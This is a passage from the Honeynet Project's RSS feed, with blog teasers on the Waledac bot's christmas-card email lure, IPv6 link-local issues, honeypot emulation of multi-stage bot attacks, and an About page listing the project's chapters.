&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/331&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <pubDate>Sat, 03 Jan 2009 21:22:38 -0600</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">331 at http://honeynet.org</guid>
</item>
<item>
 <title>Waledac is wishing merry christmas</title>
 <link>http://honeynet.org/node/325</link>
 <description>&lt;p&gt;&lt;strong&gt;Waledac is wishing merry christmas&lt;/strong&gt;&lt;br /&gt;
There is a new bot in town. It&#039;s called Waledac. The way it is spreading reminds a lot of people of the good old storm botnet: An email is sent containing a &quot;christmas card&quot; in form of the executable &quot;postcard.exe&quot;.&lt;br /&gt;
&lt;a href=&quot;http://www.honeynet.org/node/324&quot;&gt;&lt;img src=&quot;http://www.honeynet.org/files/images/Waledac.thumbnail.png&quot; width=&quot;100&quot; height=&quot;74&quot; alt=&quot;Waledac social engineering&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
A preliminary view on the binary has been given by the &lt;a href=&quot;http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231&quot;&gt;Shadowserver guys (Steve Adair)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I had the chance to have a first look at the binary (MD5 ccddda141a19d693ad9cb206f2ae0de9) and want to note down some of my few findings to let the hunt begin.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/325&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/21">Waledac</category>
 <pubDate>Fri, 02 Jan 2009 01:16:19 -0600</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">325 at http://honeynet.org</guid>
</item>
<item>
 <title>ipv6 local-link scope is a mess</title>
 <link>http://honeynet.org/node/251</link>
 <description>&lt;p&gt;I&#039;ve been looking on &lt;a href=&quot;http://en.wikipedia.org/wiki/IPv6&quot;&gt;ipv6&lt;/a&gt; lately, and even though I got a global /64 for free from he.net, I&#039;m not that amused about ipv6 yet.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/251&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/10">ipv6</category>
 <category domain="http://honeynet.org/taxonomy/term/11">link-local</category>
 <pubDate>Mon, 20 Oct 2008 11:30:22 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">251 at http://honeynet.org</guid>
</item>
<item>
 <title>No more emulation!</title>
 <link>http://honeynet.org/node/214</link>
 <description>&lt;p&gt;Emulation is an important technology in honeypots and honeynets. It&#039;s not always what we want, though, and here&#039;s why. As you might know, most bots perform attacks in multiple stages, i.e., they&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;send some exploit code to the victim that opens a shell,&lt;/li&gt;
&lt;li&gt;connect to that shell or let the shell connect back,&lt;/li&gt;
&lt;li&gt;invoke commands to download the actual malware binary,&lt;/li&gt;
&lt;li&gt;execute the malware.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Catching the exploit and providing a fake shell isn&#039;t too hard, as shown in &lt;a href=&quot;http://honeytrap.mwcollect.org/whatfor&quot;&gt;this post&lt;/a&gt;. But we certainly don&#039;t want a malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/214&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <pubDate>Wed, 27 Aug 2008 15:05:09 -0500</pubDate>
 <dc:creator>tillmann.werner</dc:creator>
 <guid isPermaLink="false">214 at http://honeynet.org</guid>
</item>
<item>
 <title>About The Honeynet Project</title>
 <link>http://honeynet.org/about</link>
 <description>&lt;p&gt;The Honeynet Project  is a leading international 501c3 non-profit security research organization, dedicated to investigating the latest attacks and developing open source security tools to improve Internet security. With Chapters around the world, our volunteers have contributed to fight again malware (such as Confickr), discovering new attacks and creating security tools used by businesses and government agencies all over the world.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/alaska&quot; class=&quot;og_links&quot;&gt;Alaskan  Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/about&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/westpoint" xmlns="http://drupal.org/project/og">West Point Chapter</group>
 <group domain="http://honeynet.org/chapters/unam" xmlns="http://drupal.org/project/og">UNAM Chapter</group>
 <group domain="http://honeynet.org/chapters/uk" xmlns="http://drupal.org/project/og">UK Chapter</group>
 <group domain="http://honeynet.org/chapters/taiwan" xmlns="http://drupal.org/project/og">Taiwan Chapter</group>
 <group domain="http://honeynet.org/chapters/spartandevils" xmlns="http://drupal.org/project/og">Spartan Devils Chapter</group>
 <group domain="http://honeynet.org/chapters/singapore" xmlns="http://drupal.org/project/og">Singapore Chapter</group>
 <group domain="http://honeynet.org/chapters/pakistan" xmlns="http://drupal.org/project/og">Pakistan Chapter</group>
 <group domain="http://honeynet.org/chapters/norway" xmlns="http://drupal.org/project/og">Norwegian Chapter</group>
 <group domain="http://honeynet.org/chapters/newzealand" xmlns="http://drupal.org/project/og">New Zealand Chapter</group>
 <group domain="http://honeynet.org/chapters/mexico" xmlns="http://drupal.org/project/og">Mexican Chapter</group>
 <group domain="http://honeynet.org/chapters/hongkong" xmlns="http://drupal.org/project/og">Hong Kong Chapter</group>
 <group domain="http://honeynet.org/chapters/hawaii" xmlns="http://drupal.org/project/og">Hawaii Chapter</group>
 <group domain="http://honeynet.org/chapters/global" xmlns="http://drupal.org/project/og">Global Chapter</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/chapters/germany" xmlns="http://drupal.org/project/og">German Chapter</group>
 <group domain="http://honeynet.org/chapters/france" xmlns="http://drupal.org/project/og">French  Chapter</group>
 <group domain="http://honeynet.org/chapters/czech" xmlns="http://drupal.org/project/og">Czech Chapter</group>
 <group domain="http://honeynet.org/chapters/malaysia2" xmlns="http://drupal.org/project/og">CyberSecurity Malaysia Chapter</group>
 <group domain="http://honeynet.org/chapters/china" xmlns="http://drupal.org/project/og">Chinese  Chapter</group>
 <group domain="http://honeynet.org/chapters/chicago" xmlns="http://drupal.org/project/og">Chicago  Chapter</group>
 <group domain="http://honeynet.org/chapters/canada" xmlns="http://drupal.org/project/og">Canadian Chapter</group>
 <group domain="http://honeynet.org/chapters/brazil" xmlns="http://drupal.org/project/og">Brazilian  Chapter</group>
 <group domain="http://honeynet.org/chapters/australia" xmlns="http://drupal.org/project/og">Australian Chapter</group>
 <group domain="http://honeynet.org/chapters/alaska" xmlns="http://drupal.org/project/og">Alaskan  Chapter</group>
 <pubDate>Sun, 10 Aug 2008 19:54:48 -0500</pubDate>
 <dc:creator>drupal</dc:creator>
 <guid isPermaLink="false">67 at http://honeynet.org</guid>
</item>
</channel>
</rss>
